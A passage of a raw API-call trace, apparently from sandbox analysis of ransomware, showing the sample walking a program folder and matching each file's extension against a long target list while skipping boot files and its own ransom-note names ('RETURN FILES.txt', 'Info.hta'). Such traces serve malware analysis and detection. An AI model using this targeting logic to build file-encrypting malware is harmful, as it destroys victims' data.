(lpString=".7z") returned 3 [0036.209] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.209] lstrlenW (lpString=".accda") returned 6 [0036.209] lstrcmpiW (lpString1=".accda", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".accdb") returned 6 [0036.209] lstrcmpiW (lpString1=".accdb", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".accdc") returned 6 [0036.209] lstrcmpiW (lpString1=".accdc", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".accde") returned 6 [0036.209] lstrcmpiW (lpString1=".accde", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".accdt") returned 6 [0036.209] lstrcmpiW (lpString1=".accdt", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".accdw") returned 6 [0036.209] lstrcmpiW (lpString1=".accdw", lpString2="nd.png") returned -1 [0036.209] lstrlenW (lpString=".adb") returned 4 [0036.209] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".adp") returned 4 [0036.209] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.209] lstrlenW (lpString=".ai") returned 3 [0036.209] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.209] lstrlenW (lpString=".ai3") returned 4 [0036.210] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ai4") returned 4 [0036.210] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ai5") returned 4 [0036.210] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ai6") returned 4 [0036.210] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ai7") returned 4 [0036.210] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ai8") returned 4 [0036.210] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".anim") returned 5 [0036.210] lstrcmpiW (lpString1=".anim", lpString2="d.png") returned -1 [0036.210] lstrlenW (lpString=".arw") returned 4 [0036.210] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".as") returned 3 [0036.210] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0036.210] lstrlenW (lpString=".asa") returned 4 [0036.210] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".asc") returned 4 [0036.210] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".ascx") returned 5 [0036.210] lstrcmpiW (lpString1=".ascx", lpString2="d.png") returned -1 [0036.210] lstrlenW (lpString=".asm") returned 4 [0036.210] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".asmx") returned 5 [0036.210] lstrcmpiW (lpString1=".asmx", lpString2="d.png") returned -1 [0036.210] lstrlenW (lpString=".asp") returned 4 [0036.210] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".aspx") returned 5 [0036.210] lstrcmpiW (lpString1=".aspx", lpString2="d.png") returned -1 [0036.210] lstrlenW (lpString=".asr") returned 4 [0036.210] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".asx") returned 4 [0036.210] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".avi") returned 4 [0036.210] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0036.210] lstrlenW (lpString=".avs") returned 4 [0036.210] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".backup") returned 7 [0036.211] lstrcmpiW (lpString1=".backup", lpString2="und.png") returned -1 [0036.211] lstrlenW (lpString=".bak") returned 4 [0036.211] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".bay") returned 4 [0036.211] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".bd") returned 3 [0036.211] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0036.211] lstrlenW (lpString=".bin") returned 4 [0036.211] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".bmp") returned 4 [0036.211] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".bz2") returned 4 [0036.211] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".c") returned 2 [0036.211] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0036.211] lstrlenW (lpString=".cdr") returned 4 [0036.211] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".cer") returned 4 [0036.211] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".cf") returned 3 [0036.211] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0036.211] lstrlenW (lpString=".cfc") returned 4 [0036.211] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".cfm") returned 4 [0036.211] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".cfml") returned 5 [0036.211] lstrcmpiW (lpString1=".cfml", lpString2="d.png") returned -1 [0036.211] lstrlenW (lpString=".cfu") returned 4 [0036.211] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".chm") returned 4 [0036.211] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".cin") returned 4 [0036.211] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".class") returned 6 [0036.211] lstrcmpiW (lpString1=".class", lpString2="nd.png") returned -1 [0036.211] lstrlenW (lpString=".clx") returned 4 [0036.211] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0036.211] lstrlenW (lpString=".config") returned 7 [0036.211] lstrcmpiW (lpString1=".config", lpString2="und.png") returned -1 [0036.212] lstrlenW (lpString=".cpp") returned 4 [0036.212] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".cr2") returned 4 [0036.212] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".crt") returned 4 [0036.212] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".crw") returned 4 [0036.212] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".cs") returned 3 [0036.212] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0036.212] lstrlenW (lpString=".css") returned 4 [0036.212] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".csv") returned 4 [0036.212] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".cub") returned 4 [0036.212] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dae") returned 4 [0036.212] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dat") returned 4 [0036.212] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".db") returned 3 [0036.212] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0036.212] lstrlenW (lpString=".dbf") returned 4 [0036.212] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dbx") returned 4 [0036.212] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dc3") returned 4 [0036.212] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dcm") returned 4 [0036.212] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dcr") returned 4 [0036.212] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".der") returned 4 [0036.212] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dib") returned 4 [0036.212] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0036.212] lstrlenW (lpString=".dic") returned 4 [0036.213] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dif") returned 4 [0036.213] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".divx") returned 5 [0036.213] lstrcmpiW (lpString1=".divx", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".djvu") returned 5 [0036.213] lstrcmpiW (lpString1=".djvu", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".dng") returned 4 [0036.213] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".doc") returned 4 [0036.213] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".docm") returned 5 [0036.213] lstrcmpiW (lpString1=".docm", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".docx") returned 5 [0036.213] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".dot") returned 4 [0036.213] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dotm") returned 5 [0036.213] lstrcmpiW (lpString1=".dotm", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".dotx") returned 5 [0036.213] lstrcmpiW (lpString1=".dotx", lpString2="d.png") returned -1 [0036.213] lstrlenW (lpString=".dpx") returned 4 [0036.213] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dqy") returned 4 [0036.213] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dsn") returned 4 [0036.213] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dt") returned 3 [0036.213] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0036.213] lstrlenW (lpString=".dtd") returned 4 [0036.213] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dwg") returned 4 [0036.213] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0036.213] lstrlenW (lpString=".dwt") returned 4 [0036.213] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".dx") returned 3 [0036.214] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0036.214] lstrlenW (lpString=".dxf") returned 4 [0036.214] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".edml") returned 5 [0036.214] lstrcmpiW (lpString1=".edml", lpString2="d.png") returned -1 [0036.214] lstrlenW (lpString=".efd") returned 4 [0036.214] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".elf") returned 4 [0036.214] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".emf") returned 4 [0036.214] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".emz") returned 4 [0036.214] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".epf") returned 4 [0036.214] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".eps") returned 4 [0036.214] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".epsf") returned 5 [0036.214] lstrcmpiW (lpString1=".epsf", lpString2="d.png") returned -1 [0036.214] lstrlenW (lpString=".epsp") returned 5 [0036.214] lstrcmpiW (lpString1=".epsp", lpString2="d.png") returned -1 [0036.214] lstrlenW (lpString=".erf") returned 4 [0036.214] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".exr") returned 4 [0036.214] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".f4v") returned 4 [0036.214] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".fido") returned 5 [0036.214] lstrcmpiW (lpString1=".fido", lpString2="d.png") returned -1 [0036.214] lstrlenW (lpString=".flm") returned 4 [0036.214] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".flv") returned 4 [0036.214] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".frm") returned 4 [0036.214] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".fxg") returned 4 [0036.214] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0036.214] lstrlenW (lpString=".geo") returned 4 [0036.215] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".gif") returned 4 [0036.215] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".grs") returned 4 [0036.215] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".gz") returned 3 [0036.215] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0036.215] lstrlenW (lpString=".h") returned 2 [0036.215] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0036.215] lstrlenW (lpString=".hdr") returned 4 [0036.215] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".hpp") returned 4 [0036.215] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".hta") returned 4 [0036.215] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".htc") returned 4 [0036.215] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".htm") returned 4 [0036.215] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".html") returned 5 [0036.215] lstrcmpiW (lpString1=".html", lpString2="d.png") returned -1 [0036.215] lstrlenW (lpString=".icb") returned 4 [0036.215] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".ics") returned 4 [0036.215] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".iff") returned 4 [0036.215] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".inc") returned 4 [0036.215] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0036.215] lstrlenW (lpString=".indd") returned 5 [0036.215] lstrcmpiW (lpString1=".indd", lpString2="d.png") returned -1 [0036.216] lstrlenW (lpString=".ini") returned 4 [0036.216] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".iqy") returned 4 [0036.216] lstrcmpiW (lpString1=".iqy", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".j2c") returned 4 [0036.216] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".j2k") returned 4 [0036.216] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".java") returned 5 [0036.216] lstrcmpiW (lpString1=".java", lpString2="d.png") returned -1 [0036.216] lstrlenW (lpString=".jp2") returned 4 [0036.216] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".jpc") returned 4 [0036.216] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".jpe") returned 4 [0036.216] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".jpeg") returned 5 [0036.216] lstrcmpiW (lpString1=".jpeg", lpString2="d.png") returned -1 [0036.216] lstrlenW (lpString=".jpf") returned 4 [0036.216] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".jpg") returned 4 [0036.216] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".jpx") returned 4 [0036.216] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".js") returned 3 [0036.216] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0036.216] lstrlenW (lpString=".jsf") returned 4 [0036.216] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".json") returned 5 [0036.216] lstrcmpiW (lpString1=".json", lpString2="d.png") returned -1 [0036.216] lstrlenW (lpString=".jsp") returned 4 [0036.216] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".kdc") returned 4 [0036.216] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0036.216] lstrlenW (lpString=".kmz") returned 4 [0036.216] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".kwm") returned 4 [0036.217] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".lasso") returned 6 [0036.217] lstrcmpiW (lpString1=".lasso", lpString2="nd.png") returned -1 [0036.217] lstrlenW (lpString=".lbi") returned 4 [0036.217] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".lgf") returned 4 [0036.217] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".lgp") returned 4 [0036.217] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".log") returned 4 [0036.217] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".m1v") returned 4 [0036.217] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".m4a") returned 4 [0036.217] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".m4v") returned 4 [0036.217] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".max") returned 4 [0036.217] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".md") returned 3 [0036.217] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0036.217] lstrlenW (lpString=".mda") returned 4 [0036.217] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mdb") returned 4 [0036.217] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mde") returned 4 [0036.217] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mdf") returned 4 [0036.217] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mdw") returned 4 [0036.217] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mef") returned 4 [0036.217] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0036.217] lstrlenW (lpString=".mft") returned 4 [0036.217] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mfw") returned 4 [0036.218] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mht") returned 4 [0036.218] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mhtml") returned 6 [0036.218] lstrcmpiW (lpString1=".mhtml", lpString2="nd.png") returned -1 [0036.218] lstrlenW (lpString=".mka") returned 4 [0036.218] lstrcmpiW (lpString1=".mka", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mkidx") returned 6 [0036.218] lstrcmpiW (lpString1=".mkidx", lpString2="nd.png") returned -1 [0036.218] lstrlenW (lpString=".mkv") returned 4 [0036.218] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mos") returned 4 [0036.218] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mov") returned 4 [0036.218] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mp3") returned 4 [0036.218] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mp4") returned 4 [0036.218] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mpeg") returned 5 [0036.218] lstrcmpiW (lpString1=".mpeg", lpString2="d.png") returned -1 [0036.218] lstrlenW (lpString=".mpg") returned 4 [0036.218] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mpv") returned 4 [0036.218] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mrw") returned 4 [0036.218] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".msg") returned 4 [0036.218] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".mxl") returned 4 [0036.218] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".myd") returned 4 [0036.218] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0036.218] lstrlenW (lpString=".myi") returned 4 [0036.218] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".nef") returned 4 [0036.219] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".nrw") returned 4 [0036.219] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".obj") returned 4 [0036.219] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".odb") returned 4 [0036.219] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".odc") returned 4 [0036.219] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".odm") returned 4 [0036.219] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".odp") returned 4 [0036.219] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".ods") returned 4 [0036.219] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".oft") returned 4 [0036.219] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".one") returned 4 [0036.219] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".onepkg") returned 7 [0036.219] lstrcmpiW (lpString1=".onepkg", lpString2="und.png") returned -1 [0036.219] lstrlenW (lpString=".onetoc2") returned 8 [0036.219] lstrcmpiW (lpString1=".onetoc2", lpString2="ound.png") returned -1 [0036.219] lstrlenW (lpString=".opt") returned 4 [0036.219] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".oqy") returned 4 [0036.219] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".orf") returned 4 [0036.219] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".p12") returned 4 [0036.219] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".p7b") returned 4 [0036.219] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".p7c") returned 4 [0036.219] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0036.219] lstrlenW (lpString=".pam") returned 4 [0036.219] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pbm") returned 4 [0036.220] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pct") returned 4 [0036.220] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pcx") returned 4 [0036.220] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pdd") returned 4 [0036.220] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pdf") returned 4 [0036.220] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pdp") returned 4 [0036.220] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pef") returned 4 [0036.220] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pem") returned 4 [0036.220] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pff") returned 4 [0036.220] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pfm") returned 4 [0036.220] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pfx") returned 4 [0036.220] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".pgm") returned 4 [0036.220] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".php") returned 4 [0036.220] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0036.220] lstrlenW (lpString=".php3") returned 5 [0036.220] lstrcmpiW (lpString1=".php3", lpString2="d.png") returned -1 [0036.220] lstrlenW (lpString=".php4") returned 5 [0036.220] lstrcmpiW (lpString1=".php4", lpString2="d.png") returned -1 [0036.220] lstrlenW (lpString=".php5") returned 5 [0036.220] lstrcmpiW (lpString1=".php5", lpString2="d.png") returned -1 [0036.220] lstrlenW (lpString=".phtml") returned 6 [0036.220] lstrcmpiW (lpString1=".phtml", lpString2="nd.png") returned -1 [0036.220] lstrlenW (lpString=".pict") returned 5 [0036.220] lstrcmpiW (lpString1=".pict", lpString2="d.png") returned -1 [0036.221] lstrlenW (lpString=".pl") returned 3 [0036.221] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0036.221] lstrlenW (lpString=".pls") returned 4 [0036.221] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0036.221] lstrlenW (lpString=".pm") returned 3 [0036.221] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0036.221] lstrlenW (lpString=".png") returned 4 [0036.221] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0036.221] lstrlenW (lpString="16_9-frame-background.png") returned 25 [0036.221] lstrlenW (lpString=".dqb") returned 4 [0036.221] lstrcmpiW (lpString1=".dqb", lpString2=".png") returned -1 [0036.221] lstrlenW (lpString="16_9-frame-background.png") returned 25 [0036.221] lstrcmpiW (lpString1="boot.ini", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="bootfont.bin", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="ntdetect.com", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="io.sys", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="Info.hta", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrcmpiW (lpString1="ivttvf.exe", lpString2="16_9-frame-background.png") returned 1 [0036.221] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned 78 [0036.221] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710fd60c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710fd60c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc32, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0036.221] lstrlenW (lpString="16_9-frame-highlight.png") returned 24 [0036.221] lstrlenW (lpString=".1cd") returned 4 [0036.221] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.221] lstrlenW (lpString=".3ds") returned 4 [0036.221] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.221] lstrlenW (lpString=".3fr") returned 4 [0036.221] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.221] lstrlenW (lpString=".3g2") returned 4 [0036.221] lstrcmpiW (lpString1=".3g2", 